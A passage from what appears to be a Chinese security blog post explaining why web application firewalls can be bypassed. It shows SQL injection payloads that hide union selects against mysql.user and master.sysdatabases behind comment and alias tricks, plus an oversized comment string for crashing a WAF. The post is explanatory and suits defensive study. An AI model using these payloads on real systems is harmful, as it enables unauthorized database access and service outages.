<p>由于waf会结合一些数据库的特性来清洗数据，对于<code>/*</code>来说，它只是一个字符串，对于<code>*/</code>来说，它也是一个字符串，更是一个别名，但是对于WAF来说，它会认为这是多行注释符，当waf把上面的payload清洗为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">9999-&quot;&quot; from mysql.user</span><br></pre></td></tr></table></figure>

<p>针对规则库进行匹配，如果没有命中规则，执行原始语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">9999-&quot;&#x2F;*&quot; union all select 1,2,3,4,5 as &quot;*&#x2F;&quot; from mysql.user</span><br></pre></td></tr></table></figure>

<p>数据库的注释一般是 # – /**/等。</p>
<h5 id="规则通用性问题"><a href="#规则通用性问题" class="headerlink" title="规则通用性问题"></a>规则通用性问题</h5><p>通用型的WAF，一般无法获知后端使用的是哪些WEB容器、什么数据库、以及使用的什么脚本语言。每一种WEB容器、数据库以及编程语言，它们都有自己的特性，想使用通用的WAF规则去匹配和拦截，是非常难的。通用型WAF在考虑到它们一些共性的同时，也必须兼顾它们的特性，否则就很容易被一些特性给Bypass！</p>
<p>比如对SQL注入数据进行清洗时，WAF一般不能知道后端数据库是MySQL还是SQL Server。那么对于MySQL的<code>/*!50001Select*/</code>来说，这是一个Select的命令，但是对于SQL Server来说，这只不过是一个注释而已，注释的内容为<code>!50001Select</code>。看个例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">9999&#39; and 1&#x3D;(select top 1 name as # from master.sysdatabases)--</span><br></pre></td></tr></table></figure>

<p>经过waf之后会被当成，waf将后端数据库认为是Mysql，由于在Mysql中 <strong>#</strong> 是注释，经过数据清洗，无法命中规则</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">9999&#39; and 1&#x3D;(select top 1 name as</span><br></pre></td></tr></table></figure>

<p>但是实际上，这里的 <strong>#</strong> 只是一个字符，充当一个别名的角色而已。如果后端数据库是SQL Server，这样的语句是没问题的。但是通用型WAF怎么能知道后端是SQL Server呢？</p>
<h5 id="为性能和业务妥协"><a href="#为性能和业务妥协" class="headerlink" title="为性能和业务妥协"></a>为性能和业务妥协</h5><p>要全面兼容各类Web Server及各类数据库的WAF是非常难的，为了普适性，需要放宽一些检查条件，暴力的过滤方式会影响业务。对于通用性较强的软WAF来说，不得不考虑到各种机器和系统的性能，故对于一些超大数据包、超长数据可能会跳过不检测。</p>
<p>例如下图中的例子：</p>
<p><img src="https://i.imgur.com/samWjm4.png" alt=""></p>
<p>从容师傅分享的例子中有个非常暴力的方法，直接用大数据包打挂WAF。。。用这个注释中包含超长查询字符串，导致安全狗在识别的过程中挂掉了，连带着整个机器 Service Unavailable：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;*666666666666666666666666666666666666666666666666666666666666666 </span><br><span class="line">66666666666666666666666666666666666666666666666666666666666666666 </span><br><span class="line">66666666666666666666666666666666666666666666666666666666666666666 </span><br><span class="line">66666666666666666666666666666666666666666666666666666666666666666 </span><br><span class="line">66666666666666666666666666666666666666666666666666666666666666666 </span><br><span class="line">66666666666666666666666666666666666666666666666666666666666666666 6666666666666666666666666666666666666666*&#x2F;</span><br></pre></td></tr></table></figure>

<p><img src="https://i.imgur.com/5W3WaNe.jpg" alt=""></p>
<h5 id="本身缺陷"><a href="#本身缺陷" class="headerlink" title="本身缺陷"></a>本身缺陷</h5><p>比如某WAF，默认情况下只能获取前100个参数进行检测，当提交第101个参数时，那么，将无法对攻击者提交的第100个以后的参数进行有效安全检测，从而绕过安全防御。（ <strong>CVE-2018-9230</strong> ）</p>
<p><img src="https://i.imgur.com/UYSBxbo.png" alt=""></p>
<h1 id="Refer"><a href="#Refer" class="headerlink" title="Refer"></a>Refer</h1><p><a href="https://mp.weixin.qq.com/s/IAqNUgOqZPkFywL90lpeTw" target="_blank" rel="noopener">记一次文件上传 Bypass WAF实战</a></p>
<p><a href="https://xz.aliyun.com/t/368" target="_blank" rel="noopener">我的WafBypass之道（SQL注入）</a></p>
<p><a href="https://www.cnblogs.com/xiaozi/p/9132737.html" target="_blank" rel="noopener">Bypass 360主机卫士SQL注入防御（多姿势）</a></p>

      
      <!-- reward -->
      
    </div>
    
    
      <!-- copyright -->
      
        <div class="declare">
          <ul class="post-copyright">
            <li>
              <i class="ri-copyright-line"></i>
              <strong>版权声明： </strong>
              本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
            </li>
          </ul>
        </div>
        
    <footer class="article-footer">
      
          
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://timeshu.github.io/2019/07/23/%E5%85%B3%E4%BA%8EWAF%E9%82%A3%E4%BA%9B%E4%BA%8B/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/WAF%E7%89%B9%E6%80%A7/" rel="tag">WAF特性</a></li></ul>


    </footer>

  </div>

  
  
  <nav class="article-nav">
    
      <a href="/2019/07/26/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            内网测试
          
        </div>
      </a>
    
    
      <a href="/2019/07/21/Acid%E9%9D%B6%E6%9C%BA/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">Acid靶机实战</div>
      </a>
    
  </nav>


  

  
  
<!-- valine评论 -->
<div id="vcomments-box">
    <div id="vcomments">
    </div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#vcomments',
        app_id: '',
        app_key: '',
        path: window.location.pathname,
        notify: false,
        verify: false,
        avatar: 'monsterid',
        placeholder: '给我的文章加点评论吧~',
        recordIP: true
    });
    const infoEle = document.querySelector('#vcomments .info');
    if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
        infoEle.childNodes.forEach(function (item) {
            item.parentNode.removeChild(item);
        });
    }
</script>
<style>
    #vcomments-box {
        padding: 5px 30px;
    }

    @media screen and (max-width: 800px) {
        #vcomments-box {
            padding: 5px 0px;
        }
    }

    #vcomments-box #vcomments {
        background-color: #fff;
    }

    .v .vlist .vcard .vh {
        padding-right: 20px;
    }

    .v .vlist .vcard {
        padding-left: 10px;
    }
</style>

  

  
  
  
  
  

</article>
</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2021
        <i class="ri-heart-fill heart_icon"></i> John Doe
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        由 <a href="https://hexo.io" target="_blank">Hexo</a> 强力驱动
        <span class="division">|</span>
        主题 - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s4.cnzz.com/z_stat.php?id=1278951134&amp;web_id=1278951134'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="Time"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/suibi">随笔</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i></p>
  <div class="reward-box">
    
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Subtitle -->

<script>
  try {
    var typed = new Typed("#subtitle", {
      strings: ['生死看淡，不服就干', '只要学不死，就往死里学', '坚持总会胜利，不死终会出头'],
      startDelay: 0,
      typeSpeed: 200,
      loop: true,
      backSpeed: 100,
      showCursor: true
    });
  } catch (err) {
    console.log(err)
  }
</script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->


<script src="/js/clickLove.js"></script>


<!-- ClickBoom -->


<script src="/js/clickBoom.js"></script>


<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>



    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="52"
        src="//music.163.com/outchain/player?type=2&id=127292094&auto=1&height=32"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
  </div>
</body>

</html>